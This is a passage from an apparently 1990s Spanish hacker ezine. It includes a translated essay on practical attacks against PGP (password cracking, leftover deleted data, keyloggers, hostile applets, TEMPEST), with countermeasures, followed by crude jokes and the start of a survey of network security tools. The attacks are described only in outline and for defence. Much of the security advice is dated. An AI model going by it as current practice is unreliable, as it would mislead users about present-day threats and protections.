c�digo fuente para la versi�n gratuita), pero la mayor�a de los usuarios de PC
en todo el mundo siguen usando Windows 3.x y usar�n PGP y shells de DOS.

++Contramedidas++

*Desconf�a de los "griegos" que llevan regalos.
*Obt�n tu copia de PGP o interfaz de una fuente fiable y conocida.
*Compila tu propio c�digo fuente de confianza (si tienes la habilidad y el compilador).
*Valida cuidadosamente todas las firmas.
*Guarda res�menes (hash) de tus criptoaplicaciones y compru�balas con regularidad.

Ataques de fuerza bruta
====================

Los ataques mediante fuerza bruta se aprovechan de gente descuidada
(por usar un calificativo suave) que usa malas frases de contrase�a.
En cierto modo, es como dejar siempre la puerta sin echar la llave.
Puede que nadie gire nunca el picaporte para ver qu� pasa, pero un
d�a puede que vuelvas a casa y te la encuentres saqueada.

PGPCrack es una aplicaci�n de fuerza bruta ampliamente diseminada,
dise�ada para reventar archivos cifrados convencionalmente mediante
PGP y que ataca la contrase�a de la clave secreta. Depende de un archivo
separado de diccionario, y prueba cada palabra como contrase�a potencial.
En un archivo protegido por PGP mediante cifrado convencional, el programa
comprueba m�s de 15.000 palabras por segundo en un Pentium a 100 MHz.
Como referencia, comp�rese con las 5.000 a 7.000 palabras/segundo para
programas t�picos de reventado de claves en UNIX en la misma m�quina.

No es descabellado suponer que algunas agencias de seguridad y espionaje
tengan sus propios programas optimizados para ataques de fuerza bruta
contra PGP. Seguramente incluye sistemas de hardware muy r�pidos y especializados.

El sentido com�n debe prevalecer con las contrase�as. Est� m�s all� del
prop�sito de este trabajo dar consejos sobre c�mo seleccionar y usar una
contrase�a fuerte. Si no lo sabe, aver�gualo.

++Contramedidas++

*Usa contrase�as fuertes.
*Usa contrase�as compartimentalizadas (esto es, algunas contrase�as para
seguridad fuerte como en PGP, otras para seguridad d�bil como en contrase�as
de salvapantallas...); si rotas las contrase�as, nunca mezcles los dos tipos.

Ataques al sistema operativo
============================

Desafortunadamente, el entorno operativo m�s popular usado en todo el mundo
hoy d�a es terriblemente inadecuado a efectos de niveles decentes de seguridad.
La arquitectura de Microsoft Windows 3.x y Windows 95 deja muchas v�as de ataque
para alguien que busque comprometer mensajes con PGP (aunque Windows NT ofrece
una mejor seguridad, conforme se someta a un escrutinio m�s intenso aparecen
m�s fallos aprovechables).

"Archivos borrados"

El usuario medio es deliciosamente ignorante de que, cuando borra un archivo,
s�lo se cambia la informaci�n sobre la asignaci�n del archivo, y el contenido
sigue residiendo en el disco hasta que sea sobreescrito por otro archivo. Hay
numerosos programas disponibles para recuperar todo o parte del contenido de
un archivo borrado.

Si usas PGP para cifrar un archivo y lo borras, o usas un editor para componer
y guardar mensajes de correo electr�nico antes de cifrar, est�s en peligro.

Hay tambi�n una vulnerabilidad en los archivos temporales borrados. Algunas
aplicaciones guardan una copia temporal del documento en el que est�s trabajando.
El archivo se borra cuando terminas la sesi�n de trabajo.
Puede que ni siquiera est�s al tanto de que existe un archivo temporal, pero el
contenido puede ser visto o recuperado por alguien con acceso a tu disco duro.

Las utilidades de "tachado" [Wipe] resuelven esta debilidad sobreescribiendo
un archivo con datos, a veces varias veces, antes del borrado. Esto evita que
un fisg�n use una herramienta de recuperaci�n de datos para recuperar un archivo
borrado o escudri�ar un disco duro en busca de evidencias incriminadoras.

PGP tiene un par�metro opcional de tachado, pero solamente con una pasada.
Una sola sobreescritura deber�a bastar para la mayor�a de los casos, pero
en algunos casos de riesgo extremo se requiere que los datos sean sobreescritos
al menos tres veces antes de su borrado.

Nota: algunos expertos han afirmado que los microscopios electr�nicos de
barrido o de efecto t�nel pueden ser capaces de recuperar datos sobreescritos
entre 7 y 9 veces. Sin embargo, debido al coste y a los factores que afectan
la remanencia magn�tica fuera de las condiciones de laboratorio, este es un
ataque improbable.

++Contramedidas++

*No dejes por ah� copias archivos de de texto no cifrado.
*Usa utilidades de borrado seguro.
*Ojo a las aplicaciones que usan archivos temporales
*Destruye f�sicamente (rasga/quema/pulveriza/mete en �cido) los medios
magn�ticos viejos [discos duros, disquetes] que contengan datos seguros.

"Espacio residual [slack space]"

DOS/Windows asigna espacios de disco en paquetes llamados clusters.
Por ejemplo, con un tama�o de cluster de 2k, un archivo de 100 bytes
usa el mismo espacio que un archivo de 2.048 bytes. El espacio residual
es el espacio que hay entre el final del archivo f�sico y el final del
cluster asignado. Si bien una utilidad de borrado seguro sobreescribe el
archivo f�sico, los bytes del espacio residual suelen permanecer.

Esto significa un riesgo, ya que pueden quedar bits y trozos de texto no
cifrado en un disco duro. Como ejercicio, usa un editor de disco y busca
en tu disco duro una cadena de texto referente a algo de informaci�n privada.
Es probable que encuentres referencias en clusters no asociados con archivos
actualmente asignados. Un fisg�n puede lanzar un ataque similar de exploraci�n.

Desfragmentar el disco duro no eliminar� los datos almacenados en el espacio
residual. Tu �nica opci�n es usar un programa dise�ado para borrar los bytes
no asignados que se encuentran al final de los clusters.

++Contramedidas++

*Usa programas para el borrado de espacio residual
- http://www.sky.net/~voyageur/wipeutil.htm [N. del T. otro programa
eficaz para borrado de espacio residual es BCWipe]

"Vigilancia del teclado" (KEYLOG)

La principal debilidad de cualquier criptosistema es habitualmente la
autenticaci�n de la contrase�a. Los usuarios suelen cometer muchos errores
involuntarios al seleccionar y asegurar una contrase�a. Sin embargo, las contrase�as
son asimismo extremadamente vulnerables al nivel del sistema operativo.

Las rutinas de gesti�n de claves en DOS y Windows pueden ser f�cilmente parcheadas
para capturar las pulsaciones sobre el teclado. Las pulsaciones pueden ser grabadas
en el disco o transmitidas por una red. Hay numerosas aplicaciones DOS y Windows en
Internet para el monitoreo de pulsaciones, que podr�an usarse para subvertir una
contrase�a de PGP. Con la contrase�a revelada, el fisg�n solamente necesita una copia
del archivo de claves secretas.

++Contramedidas++

*Usa aplicaciones dise�adas para evitar la vigilancia del teclado (NetSafe).
*Guarda res�menes (hash) cifrados, o firmas, de ficheros clave en el sistema operativo
"limpios" para futura referencia.

"Vulnerabilidades de red"

Se han identificado diversas debilidades relacionadas con la seguridad en entornos
de red en Windows 3.x, Windows 95 y Windows NT. No est� al alcance del presente
trabajo discutir estas debilidades en detalle. Como poco, los usuarios deber�n estar
al tanto de que bajo ciertas circunstancias, es posible el acceso encubierto a datos
mediante las unidades de disco en acceso a redes

++Contramedidas++

*Mantente al d�a respecto a las vulnerabilidades de red de Windows.
*Usa archivos Winsock (de los que guardan registro de las actuaciones pasadas) para
vigilar las conversaciones en protocolos.

Ataques por red
===============

El crecimiento de Internet ha supuesto nuevas amenazas para los usuarios. Los d�as de
los PC como estaciones de trabajo monousuario o en peque�as redes de confianza son
cosa del pasado. Los ataques remotos lanzados por Internet son ahora una posibilidad
real. Estos tipos de ataques, ya sea contra individuos o empresas, aumentar�n con toda
seguridad en el futuro.

"Ataques con virus"

Virus con fines de espionaje. Dise�ados para recoger/robar informaci�n. Pueden ser de
despliegue vertical o horizontal.

Hay un brillante futuro para los virus "de espionaje". Considera un virus que se extienda
solamente a m�quinas con copia de PGP en su interior.

++Contramedidas++

*Usa programas para comprobaci�n antivirus.

"Ataques por navegadores y aplicaciones [applets] hostiles"

Al haberse ido convirtiendo los navegadores en programas clave para los usuarios, hay que
tener en cuenta los riesgos que subyacen a su naturaleza ubicua. Se ha descubierto
numerosos fallos de seguridad en los navegadores tanto de Netscape como de Microsoft,
los cuales permiten el acceso remoto no autorizado al disco duro de un usuario. Varios
de estos fallos podr�an ser explotados contra PGP para:

*robar un archivo de claves
*modificar un archivo de claves
*instalar un caballo de Troya
*permitir acceso a archivos no cifrados

Aunque los vendedores sacan parches contra dichos fallos, no todos los usuarios son
conscientes de que puede haber problemas de seguridad en versiones m�s antiguas.

Adem�s de esto, en la vor�gine competitiva para sacar al mercado nuevas versiones
de los navegadores, est�n mostrando sus feas caras muchos m�s fallos de los que se
puedan ver en un producto con un ciclo de desarrollo normal. Cuantos m�s fallos, m�s
posibilidades hay de que uno de ello pueda convertirse en un agujero de seguridad.
(El ambocioso esfuerzo de Microsoft llamado Windows 98, que fusionar� el ordenador con
Internet, significar� sin duda mayor vulnerabilidad debido a la naturaleza de la uni�n
transparente entre el PC y la red).

Aparte los riesgos asociados con los fallos de los navegadores, los lenguajes de
programaci�n como Java, JavaScript y VBScript, as� como la arquitectura ActiveX de
Microsoft permiten una posible v�a de entrada a ataques remotos mediante el acceso
a p�ginas Web.

Si bien el modelo de seguridad en Java ofrece te�ricamente una barrera para mantener
las aplicaciones [applets] fuera de los datos del usuario, siguen apareciendo fallos
de seguridad. ActiveX no ofrece seguridad contra estos tipos de ataques, ya que funciona
mediante un modelo de confianza basado en firmas, en el que el sentido com�n del usuario
es la fuerza predominante.

Aunque la mayor�a de la gente se preocupa por p�ginas Web dise�adas para resultar
destructivas, no existe mucha informaci�n sobre p�ginas Web dise�adas para espionaje,
las cuales extraen ocultamente informaci�n del disco duro de un usuario. Estas
"p�ginas de ataque", pasivas y relativamente dif�ciles de detectar, pueden acabar
siendo una amenaza sustancial a la intimidad y seguridad en el futuro.

Hasta la fecha, no hay contenidos en p�ginas Web lo bastante atractivos para
arriesgarse habilitando opciones Java, SavaScript y ActiveX en tu navegador.

++Contramedidas++

*Mantente al d�a con los �ltimos parches de tu navegador.
*No conf�es en p�ginas Web que contengan Java, JavaScript, VBScript o ActiveX
*Usa una estrategia de "rojo/negro" con dos ordenadores (uno conteniendo informaci�n
insegura y usado para navegar por la red; el otro con informaci�n asegurada y
aislado de la ved).
*Usa Lynx.

Ataques por vigilancia electr�nica
===================================

Adem�s de los ataques a PGP basados en ordenador, pueden usarse m�todos
tradicionales de vigilancia electr�nica para comprometer la seguridad que
el cifrado suele ofrecer.

"Vigilancia audio y video"

Podr�an escribirse tomos enteros sobre t�cnicas de vigilancia y contravigilancia
electr�nica usada por agencias de inteligencia, fuerzas de seguridad y el sector
privado. Aunque estos m�todos quedan fuera del alcance de este trabajo, es importante
recordar que estos tipos de ataques pueden usarse junto con ataques basados por
ordenador como los anteriormente descritos, u otros. Algunos ejemplos:

*Las personas suelen hablar consigo mismas al usar un ordenador. Un micr�fono de
audio puede revelar la contrase�a u otra informaci�n.
*Un teclado est�ndar puede ser cambiado por un modelo modificado que contenga un
transmisor para emitir una se�al �nica para cada tecla pulsada. Pueden enviarse
se�ales de radio a cada pulsaci�n, o almacenadas y enviadas a intervalos aleatorios
en una transmisi�n r�pida.
*Puede incluso usarse vigilancia no electr�nica. Se conocen casos de hackers que
usaban telescopios para observar monitores de ordenador por las ventanas. Si
bien el equipo de vigilancia suele ser caro, hay aparatos de menor precio.
Considera que la vigilancia electr�nica puede usarse por oponentes que
carezcan de la habilidad t�cnica para montar un ataque basado en ordenador.

++Contramedidas++

*Si el modelo de amenaza lo permite, usa contramedidas t�cnicas anti-vigilancia (TSCM)
*No conf�es en detectores de micr�fonos de los de "tiendas de esp�as", ya que
por lo general solo detectan los tipos m�s b�sicos de ingenios de vigilancia
(a menos que tengas la experiencia y el equipo adecuados, no podr�s detectar
aparatos sofisticados de vigilancia).

"TEMPEST"

TEMPEST es una palabra c�digo sobre el estudio de las emanaciones electromagn�ticas
y las contramedidas necesarias para evitar la fuga de informaci�n. Por ejemplo,
los monitores de ordenador sueltan emanaciones electromagn�ticas. En las
condiciones correctas y con el equipo t�cnico adecuado, es posible recrear el
contenido de la pantalla desde una ubicaci�n remota. Los riesgos de seguridad son obvios.

A pesar de los esfuerzos de los gobiernos occidentales para mantener la
informaci�n tipo TEMPEST oculta, hay bastante informaci�n p�blica disponible
(ver http://www.eskimo.com/~joelm/tempest.html).

Algunos "expertos" pintan un cuadro de furgonetas en cada esquina, rastreando
las pantallas de los PCs en las ondas. Para la mayor�a, la amenaza de vigilancia
de emanaciones es irrealista. Bajo las condiciones del mundo real, es dif�cil
re-crear una pantalla de ordenador capturada. No obstante, si el enemigo tiene acceso
a recursos cuantiosos y el objetivo tiene alto valor, tales ataques pueden ser viables.

++Contramedidas++

*Usa t�cnicas y componentes habituales de apantallamiento de radiofrecuencia
para reducir las fugas electromagn�ticas de tu PC, perif�ricos y cableado.
*Compra hardware apantallado contra TEMPEST

Ataques no t�cnicos
========================
La tecnolog�a suele verse como una soluci�n m�gica a los problemas de seguridad.
No lo es. El hecho simple es que los ataques que involucran personas en vez de
tecnolog�a suelen ser m�s efectivos y econ�micos.

Es muy peligroso subestimar el elemento humano. Piensa en:
*Soborno, amenazas o coerci�n f�sica sobre amigos, familiares o colegas.
*Irrupciones y robos, aprobados judicialmente o ilegales.
*Confianza en la persona equivocada.

Cualquiera de estas condiciones comprometer� comunicaciones cifradas con PGP
m�s deprisa que una bancada de superordenadores Cray.

++Contramedidas++

*Revisa la seguridad f�sica en sus premisas.
*No escribas tu contrase�a.
*No entres tu contrase�a enfrente de otros.
*Guarda los archivos de claves en un disquete floppy y en lugar seguro.
*No aceptes caramelos de desconocidos.
*No conf�es en nadie.

Conclusi�n
==============

Defenderte contra ataques pr�cticos a PGP es factible si tienes en cuenta
algunas contramedidas.

*�Cu�l es tu modelo de amenazas? Esto debe dictarte tus contramedidas.
*Usa una estrategia de "rojo/negro"
*No seas tonto con tu contrase�a
*No ejecutes PGP en una red
*Usa SFS, SecureDrive, SecureDisk, BestCrypt, F-Secure, etc.
*Guarda res�menes MD5 o firmas PGP de archivos "limpios" de PGP y del
sistema operativo, y compru�balos peri�dicamente.
*Usa programas antivirus
*Guarda los archivos de claves en un disquete (cifrado convencionalmente)
*Borra archivos y espacio residual de modo seguro
*Destruye f�sicamente (pulveriza/quema/machaca) discos viejos que tengan
datos de inter�s
*Vigila los registros Winsock de TCP-IP
*Desactiva las opciones Java, JavaScript y ActiveX en tu navegador
*No te olvides de la seguridad f�sica
*Ten cuidado en qui�n conf�as
*Obt�n tu copia de PGP de una fuente fiable
*L�brate de Windows y usa Linux con CFS

Joel McNamara (
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
)

http://www.eskimo.com/~joelm/pgpatk.html Documento original en ingles
http://www.ugr.es/~aquiran/cripto/expedien/exped004.htm Documento
traducido por Arturo Quirantes .

Para buscar amas informacion de PGP y criptografia en espa�ol ,
Revisa la pagina de Arturo Quirantes :
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla

http://www.ugr.es/~aquiran/

�������������������������������������������������������������������������������

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# #
# 6.- Chistes , Cuentos y otras Burradas #
# #
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_________________________________________________________________________ By Varios

Bueno esta seccion se alimenta principalmente de la lista de correo de Nustro amigo
Charlie Gomez desde Colombia ... Gracias Charlie !!!!

EL NUEVO AUTOMOVIL MICROSOFT 95
===============================

Buenas noticias: Microsoft ha lanzado a la venta un automovil
ultramoderno.Funciona de la siguiente manera:

1. - Usted introduce las llaves y aprieta el bot�n de encendido.
Los vidrios del parabrisas se oscurecen autom�ticamente y usted no
puede ver nada. No se preocupe. Usted no necesita ver nada. El auto
Microsoft vera el camino por usted.

2. - El motor comienza a calentarse. En el monitor del panel
aparece la siguiente leyenda: "Inicializando... espere, por favor." Pasan
cuatro minutos. Aparece una nueva leyenda: "Combustible, OK. Neum�ticos, OK.
Ventilaci�n, OK. Tubo de escape, OK. Cinturones de seguridad, OK.
Apague el cigarrillo, por favor".

3. - Tres minutos mas tarde, otra leyenda: "El sistema de
autodiagn�stico ha descubierto que usted ha cambiado recientemente el
filtro del aceite. Espere mientras el sistema se reinstala.Mientras
tanto, puede usted registrar su nuevo filtro de aceite enviando un
e-mail al fabricante: para hacerlo as�, haga click en el icono
correspondiente ". Usted llena su formulario, registra su nuevo filtro
y env�a el mensaje. Pasan cuatro minutos. Aparece un nuevo mensaje
en el monitor: "Error de sistema. Se ha detectado una incompatibilidad
en el modulo 00 33 44 789 235. Haga el favor de apagar todo y vuelva a
encender la maquina despu�s de quince segundos".

4. - Usted sigue las instrucciones y luego de un breve proceso de
quince minutos el auto se pone en marcha. Pronto aparece en el
monitor un mensaje: "Hemos llegado a un cruce. Haga click en la opci�n que
prefiere: Giro a la Derecha - Giro a la Izquierda - Seguir en l�nea recta -
Retroceder al punto de partida - Apagar la maquina". Usted hace
click en su opci�n, y aparece un mensaje en el monitor: "Usted ha
optado por girar a la Derecha. Esta seguro? - Si - No ". Usted
indica que si. El auto gira a la derecha.

5. - Inmediatamente aparece un mensaje en el monitor:
"Insuficiente reserva de combustible. Apague su maquina, por favor y p�ngase en
contacto con su proveedor de gasolina". Usted apaga la maquina y activa
un programa de diagnostico que le informa: "En el tanque de gasolina
tiene usted 252 litros de combustible". Usted activa otro programa
especial de "Ayuda", que le explica: "Aunque haya mucha gasolina
en el tanque, el sistema le dir� que no tiene suficiente cada vez que
usted haya hecho operaciones que implican un gasto virtual, aunque no
haya hecho un gasto real. Para evitar este inconveniente, usted tiene
tres opciones:

a) Comprar una nueva versi�n operativa del sistema;

b)Continuar con la versi�n actual, pero desactivando la funci�n de
autodiagn�stico. Esta ultima opci�n funciona bastante bien, pero
el auto le funcionara como un Ford T y usted deber� encenderlo con
manivela;

c) Comprar un doble tanque de combustible, con capacidad para 999 litros.
Debe ser de marca Microsoft y debe llenarse con gasolina Microsoft de octanaje 95".

6. - Despu�s de pensarlo un rato, usted se decide por la primera
opci�n, y a trav�s de su m�dem, que todav�a le funciona (no es
Microsoft), compra la nueva versi�n operativa y procede a su
instalaci�n. Esto le lleva unas dos o tres horas, porque a cada
momento aparecen mensajes como este: "El programa de instalaci�n ha
detectado que la rutina para el manejo de los frenos que usted ya tiene
instalada es mejor que la que trata de instalar ahora. Quiere Usted
remplazarla con la nueva o dejar la vieja? Le recomendamos que conserve la
vieja".

7. - Luego de instalar la nueva versi�n operativa, usted constata
que ha conservado las viejas rutinas de frenos, direcci�n, escape,
control de aceite, veloc�metro, medidor de distancias, bar�metro, reloj
autom�tico, carburador, alarmas, limpiavidrios, aire acondicionado,
refrigeraci�n del motor y control de aire en los neum�ticos. Lo �nico
que ha instalado ha sido el nuevo numero de licencia y el tipo

8. - Lleno de esperanza en el progreso, usted enciende ahora su
maquina dispuesto a llegar al trabajo, aunque sea para marcar la tarjeta de
salida. En el monitor aparece de inmediato un mensaje: "Lo sentimos,
el sistema operativo que usted esta usando no funciona en la maquina
que usted tiene. Por favor, modernice su hardware. Esta maquina se
apagara ahora autom�ticamente".

9. - Mientras usted ha estado haciendo todo lo anterior, en
medio de la v�a, han pasado raudamente a su lado tres autom�viles MacIntosh
(los �nicos tres que hay activos en el mercado, porque la empresa no ha
podido vender mas). Al parecer funcionan bien, pero esa es otra
historia que aqu� no tiene importancia. Tambi�n han pasado setecientas
ochenta y tres carretas tiradas por burros, catorce mil seiscientos
noventa y un autom�viles de manejo manual, anticuados, y unas
cuantas docenas de autom�viles Windows 3.11, que van a tropezones pero
van. Usted maldice su perra suerte, maldice la vida, maldice los
inspectores de transito que ya le han puesto ocho multas por estorbar el
trafico de veh�culos... pero mira orgulloso a los peatones que lo observan,
muertos de la envidia, porque usted es el feliz propietario de un
fant�stico autom�vil Microsoft 95, maravilla de la t�cnica y s�mbolo
universal del genio tecnol�gico moderno. Y este privilegio sublime bien merece
ser pagado con algunas min�sculas incomodidades.

LA COCA COLA NUESTRA DE CADA DIA
===============================

Se apersonan altos funcionarios de Coca Cola ante Su
Santidad en el Vaticano para hacerle una propuesta:

Su Santidad, le ofrecemos US.000.000 mensuales para que se
cambie en el Padre Nuestro la frase "El pan nuestro de cada
d�a ..." por "La Coca Cola nuestra de cada d�a.."

A lo que el Santo Padre responde: "No podemos hacer eso Hijo M�o.."

Tras unos meses vuelven a visitar el Vaticano con otra
propuesta: Su Santidad nuestra empresa le ofrece
US0.000.000 anuales para cambiar en el Padre Nuestro la
frase "El pan nuestro de cada d�a ..." por "La Coca Cola
nuestra de cada d�a.."

A lo que el Santo Padre responde: "de ninguna manera podemos
hacer eso Hijo M�o..."

Insistentes estos funcionarios, consiguen una cita con el
Sumo Pont�fice, y le presentan una oferta de su Corporaci�n:
Su Santidad nuestra empresa ha decidido ofrecerle a su
Iglesia la cantidad de USjumi.500.000.000 anuales para que se
cambie en el Padre Nuestro la frase "El pan nuestro de cada
d�a ..." por "La Coca Cola nuestra de cada d�a..."

A lo que el Santo Padre, voltea hacia su Secretario y le
pregunta: "�En que fecha termina nuestro contrato con los
panaderos...?

FORMAS DE PENSAR
=================

En la clase de matem�ticas, pregunta la se�orita a sus
peque�os pupilos...

-" A ver ni�os, hay tres pajaritos sentados en una rama, un
cazador dispara y cae uno de ellos, �cu�ntos quedan en la
rama?"

- "Ninguno", responde Jaimito despu�s de pensarlo
detenidamente...

- "NO, no, Jaimito"... responde la maestra confundida...
levanta los tres dedos y repite "...baja uno, cuantos
quedan???"...

- "Ninguno", insiste Jaimito autoritariamente. "Los otros
pajaritos se asuntan y no queda ninguno en la rama...".

- "Excelente, Jaimito... no es muy matem�tico pero me gusta
tu forma de pensar!"

El ni�o, a su vez consulta con la maestra... "Hay tres
se�oritas con helados en la mano sentadas en un banco del
parque. La una chupa el helado, la otra muerde el helado y
la tercera lo lame lentamente... �cu�l de ellas est� casada?"

La maestra lo mira como si no entiende, y Jaimito repite
insistentemente...: "una lo muerde, otra lo chupa, otra lo
lame... �cu�l es la casada?".

T�midamente la se�orita responde "la que chupa..."
"No, No..." dice Jaimito... "la que tiene el aro de
matrimonio en el dedo, pero ME GUSTA SU FORMA DE PENSAR..."

SOR RITA
========

Hab�a una vez una chica que desde peque�a so�aba con ser
monja, y un d�a decide irse a un convento para cumplir su
sue�o.

All� estuvo mas de 9 a�os dedic�ndose a tomar sus votos,
hasta que llega el d�a esperado de casarse definitivamente
con Jesucristo es entonces cuando son bautizadas con su
nuevo nombre:

Madre Superiora: Tu hija te llamaras Mar�a, SOR Mar�a, tu
hija te llamaras Teresa, SOR Teresa y cuando le toca a la
muchacha en cuesti�n le dice: TU te llamaras Rita, SOR Rita.
Es en este momento que la muchacha rompe en llanto por que
dec�a que como una monjita se llamar�a ZORRITA (SOR RITA) y
decide enviar al Vaticano una carta donde hacia la petici�n
de cambio de nombre, al cabo de los meses le env�an el
pasaje y todo lo necesario para ir a cambiarse el nombre, y
llega al Vaticano...

Padre: Hija te hemos dado la oportunidad, pero debes saber
que este nuevo nombre que tomes de la caja ser� el
definitivo, NO HAY VUELTA ATRAS!!!

Sor Rita: Si padre, estoy segura que no habr� nada peor que
llamarse ZORRITA

Padre: OK, toma un nombre y encomi�ndate a Jes�s.
Sor Rita toma el papelito y sin leerlo se lo da al Padre.

Padre: Hija Te llamaras RAIMUNDA

LA MUERTE DE CLINTON Y EL PAPA
=============================

El Presidente Clinton y el Papa mueren el mismo d�a y debido
a un problema administrativo, mandan a Clinton al cielo y al
Papa al infierno.

El Papa explica la situaci�n al diablo, el revisa todos los
papeles y se da cuenta del error. Sin embargo, el diablo le
explica al Papa que tomar� 24 horas arreglar el problema y
corregir el error. Al d�a siguiente el Papa es despedido por
el diablo y se dirige rumbo al cielo. Mientras sub�a se
encuentra con Clinton, quien venia bajando y se paran a
conversar.

Papa: Lamento la confusi�n

Clinton: No hay problema

Papa: Estoy muy emocionado. He esperado con ansias el
momento de ir al cielo.

Clinton: �Y eso por qu�?
Papa: Toda mi vida he querido conocer a la Virgen Mar�a

Clinton: Lo siento, llegas un d�a tarde.

FIDEL Y EL PAPA CAEN AL MAR
=========================

Cuentan que durante la reciente visita del Papa a Cuba,
Fidel invita al Papa a dar una vuelta en una balsa y se caen
al mar. Fidel no se hunde sino que camina sobre el agua y le
da la mano al Papa y lo salva.

En el Vaticano la noticia es que Fidel hizo un milagro

En el Gramma de Cuba dicen que Fidel es Dios

"En Miami declaran que Fidel no sabe nadar".

EL DEDO EN LA SOPA
==================

Un hombre entra a un restaurante y pide al camarero que le
traiga una sopa; al poco tiempo viene el camarero con la
sopa y a la vez tra�a el dedo gordo metido en la sopa.

Cuando el cliente se da cuenta, le dice al camarero:
-Que bonito, se fij� que trae el dedo gordo metido en
la sopa, no cabr�n?

El camarero le dice:

-Lo que pasa es que me pico una avispa y el m�dico me dijo
que tuviera el dedo metido en algo caliente

A lo que el cliente con arrechera, le dice:

-�Por que no te lo metes en el culo?;

El camarero le responde:

- Precisamente eso es lo que hago entre plato y plato

FAQ?
====

1. Por que los kamikazes llevaban casco?
2. Por que venden tabaco en las gasolineras,si esta prohibido fumar ?
3. Adan y Eva, tenian ombligos?
4. Si los Seven Eleven estan abiertos 24 horas al dia, 365 dias al
anho,entonces porque las puertas tienen cerrojo?
5. Si nada se pega al teflon, como lo pegaron a la sarten ?
6. Si Superman es tan listo, entonces por que lleva los calzoncillos
por fuera ?
7. Es peligroso masturbarse debajo de una manta electrica ?
8. Como saben los ciegos cuando han acabado de limpiarse el culo?
9. Cuando te haces una foto al lado de Mickey Mouse, el hombre de
dentro del disfraz esta sonriendo ?
10. Por que bragas es plural y sujetador es singular ?
11. Por que en los anuncios de raquetas de tenis aparece gente jugando
al tenis, en los anuncios de coches puedes ver 12. coches, y sin
embargo en los anuncios de condones no ves mas que gente jugando al
tenis o coches parados?
13. Por que no hacen los aviones con el mismo material que usan para
hacer la caja negra ?
14. Por que cuando llueve levantamos los hombros ? ? Acaso nos mojamos
menos ?
15. Por que cuando conduces buscando un sitio para aparcar bajas el
volumen de la radio? ?Acaso vas a ver mejor ?
16. El otro dia oi que las esponjas crecen en el mar. Hasta donde
llegaria el agua si no fuese por ellas ?
17. Si estamos compuestos en un 80% de agua, como podemos ahogarnos?
18. Se dice que solo diez personas en todo el mundo entendian a
Einstein.?Si nadie me entiende a mi, soy un genio?
19. Si los vegetarianos comen vegetales, que comen los humanitarios ?
20. Si carcel y prision son sinonimos, porque no lo son carcelero y
prisionero ?
21. Si una palabra estuviese mal escrita en el diccionario, como lo
sabriamos ?
22. Por que en los Estados Unidos te hace falta el carnet de conducir
para comprar alcohol, si esta prohibido beber y conducir ?
23. Los caballos tienen sobacos ?
24. Cuando un coche esta circulando, el aire dentro de las ruedas esta
girando ?
25. El otro dia compre agua en polvo. Pero como la preparo ?
26. Si los banqueros pueden contar, porque en los bancos hay ocho
ventanillas y solo cuatro cajeros ?
27. Si un gato cae siempre de pie, y una tostada con mantequilla cae
siempre por el lado en que esta untada, que pasaria si le atas un gato
en la espalda una tostada con la mantequilla hacia arriba y luego lo
tiras al aire ?
28. De que color es un camaleon mirandose en un espejo?
29 En caso de guerra nuclear, los pulsos electromagneticos de las
bombas termonucleares podrian danar mis videocassettes?
30. Que pasaria si un hermano siames fuese declarado culpable de un
asesinato y condenado a muerte en la silla electrica?
31. Si fueses a disparar a un mimo, te haria falta silenciador ?
32. Por que las bailarinas andan siempre de puntillas ? ?No seria mas
facil contratar bailarinas mas altas ?
33. A una nave espacial que esta viajando a la velocidad de la luz, le
funcionan los faros ?
34. Un esquizofrenico paranoico tiene miedo de estar persiguiendose?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# #
# 7.-Seguridad en Redes y Sistemas #
# #
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

__________________________________________________________ By Francisco Cruz A.

Introducci�n

En este art�culo se intenta describir de forma resumida algunas herramientas que
pueden ayudar a mejorar el nivel de seguridad de una red integrada en Internet
as� como los sistemas que lo forman. �ltimamente ha aparecido un gran n�mero de
herramientas de seguridad, para este art�culo se han elegido las que parec�an
m�s representativas, aunque puede haber otras que es posible sean m�s �tiles
dependiendo de la funcionalidad que se les quiera dar. Todas las herramientas
descritas han sido instaladas y algunas de ellas est�n en funcionamiento de forma
continua en la Universidad Carlos III de Madrid.

Dividiremos las herramientas existentes en dos tipos: aquellas que nos alertan
de conexiones no deseadas y que nos permiten hacer un seguimiento de �stas, as�
como poder decidir sobre qu� conexiones permitimos y cuales no (herramientas de
control y seguimiento de accesos), y aquellas que se centran m�s en la seguridad
del sistema (herramientas que chequean la integridad del sistema), para detectar
una vez que el sistema ha sido asaltado el alcance de los posibles da�os.

Todas las herramientas de este documento son de dominio p�blico y se encuentran
en multitud de servidores de ftp an�nimo y www.

1.- Herramientas de control y seguimiento de accesos

En este apartado se encuentran aquellas herramientas que nos permitir�n tener una
informaci�n (mediante ficheros de trazas) de todos los intentos de conexi�n que se
han producido sobre ese sistema o sobre otro que nosotros hayamos se�alado, as� como
intentos de ataque de forma sistem�tica a puertos tanto de TCP como de UDP
(herramientas de tipo SATAN). Este tipo de herramientas nos permite tener un control
sobre todos los paquetes que entran por el interfaz de red de la m�quina: IP (TCP,
UDP) e ICMP, o analizando paquetes a nivel de aplicaciones (TELNET, FTP, SMTP, LOGIN,
SHELL...). Estas herramientas pueden ser utilizadas junto con otras que nos permitan
definir desde qu� m�quinas permitimos ciertas conexiones y de cuales se prohiben.
Algunas de las herramientas descritas en este apartado no necesitan estar instaladas
en la m�quina que se quiere controlar (ya que se puede poner en una m�quina cuyo
interfaz de red funcione en modo promiscuo, permitiendo seleccionar la direcci�n
IP o m�quina que queremos auditar).

Algunas de las herramientas descritas en este apartado pueden tener un doble uso, es
decir nos permiten protegernos ante posibles ataques, pero tambi�n podr�an ser
utilizadas para intentar comprometer los sistemas. Por eso es importante que el uso
de estas herramientas est� restringido (en la manera que se pueda) para que no todo
el mundo est� utiliz�ndolas de forma aleatoria y nos oculten realmente un ataque.
Tambi�n podr�n ser utilizadas para hacer seguimientos en la red cuando creamos que
alguna de nuestras m�quinas ha sido comprometida.

Las herramientas que permiten este tipo de operatividad son: tcp-wrapper, netlog,
argus, tcpdump, SATAN, ISS,courtney, gabriel, nocol, tcplist.

1.1.- tcp-wrappers

El tcp-wrappers es un software de domino p�blico desarrollado por Wietse Venema
(Universidad de Eindhoven, Holanda). Su funci�n principal es proteger a los sistemas
